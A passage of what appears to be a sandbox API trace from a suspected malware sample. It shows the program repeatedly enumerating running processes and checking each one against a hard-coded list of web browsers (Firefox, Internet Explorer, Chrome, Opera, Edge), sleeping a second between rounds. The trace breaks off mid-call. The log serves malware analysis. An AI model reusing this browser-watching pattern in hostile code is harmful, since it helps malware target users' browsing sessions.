[0161.420] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0161.420] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0161.420] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0161.420] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0161.420] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.420] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0161.421] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0161.421] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0161.421] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0161.421] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0161.421] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.421] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0161.421] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0161.421] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0161.421] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0161.422] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0161.423] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.423] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0161.423] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0161.423] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0161.423] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0161.423] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0161.423] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.423] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0161.424] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0161.424] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0161.424] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0161.424] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0161.424] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.424] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0161.424] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0161.424] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0161.424] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0161.424] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0161.424] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.424] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.425] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0161.425] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0161.425] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0161.425] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0161.425] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.425] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0161.425] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0161.425] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0161.426] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0161.426] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0161.426] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.426] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.426] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0161.426] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0161.426] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0161.426] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0161.426] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.426] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0161.427] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0161.427] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0161.427] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0161.427] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0161.427] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.427] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.427] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0161.427] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0161.427] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0161.427] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0161.427] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.427] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0161.428] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0161.428] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0161.428] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0161.428] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0161.428] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.428] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0161.428] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0161.429] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0161.429] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0161.429] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0161.429] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.429] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0161.429] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0161.429] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0161.429] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0161.429] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0161.429] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.429] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0161.430] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0161.430] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0161.430] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0161.430] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0161.430] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.430] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0161.430] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0161.430] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0161.430] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0161.430] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0161.430] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.430] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0161.431] CloseHandle (hObject=0xe8) returned 1 [0161.431] Sleep (dwMilliseconds=0x3e8) [0162.439] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0162.442] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.442] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0162.442] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0162.442] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0162.442] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0162.442] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0162.442] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0162.443] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0162.443] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0162.443] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0162.443] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0162.443] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0162.443] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0162.443] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0162.444] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0162.444] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0162.444] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0162.444] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.444] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.444] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0162.444] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0162.444] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0162.444] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0162.444] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.444] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0162.445] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0162.445] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0162.445] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0162.445] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0162.445] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.445] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0162.445] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0162.445] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0162.445] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0162.445] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0162.445] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.445] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0162.446] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0162.446] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0162.446] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0162.446] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0162.446] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.446] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0162.447] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0162.447] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0162.447] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0162.447] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0162.447] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.447] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0162.447] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0162.447] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0162.447] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0162.447] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0162.447] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.447] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0162.448] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0162.448] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0162.448] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0162.448] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0162.448] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.448] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.448] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.448] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.448] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.448] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0162.448] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.448] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.449] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.449] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.449] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.449] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0162.449] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.449] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.450] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.450] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.450] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.450] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0162.450] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.450] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.450] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.450] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.450] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.450] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0162.450] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.450] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.451] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.451] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.451] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.451] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0162.451] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.451] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0162.452] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0162.452] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0162.452] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0162.452] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0162.452] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.452] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.453] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.453] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.453] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.453] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0162.453] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.453] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0162.454] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0162.454] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0162.454] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0162.454] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0162.454] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.454] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0162.454] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0162.454] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0162.454] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0162.454] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0162.454] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0162.454] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0162.455] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0162.455] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0162.455] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0162.455] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0162.455] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0162.455] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0162.455] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0162.455] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0162.455] lstrcmpiA 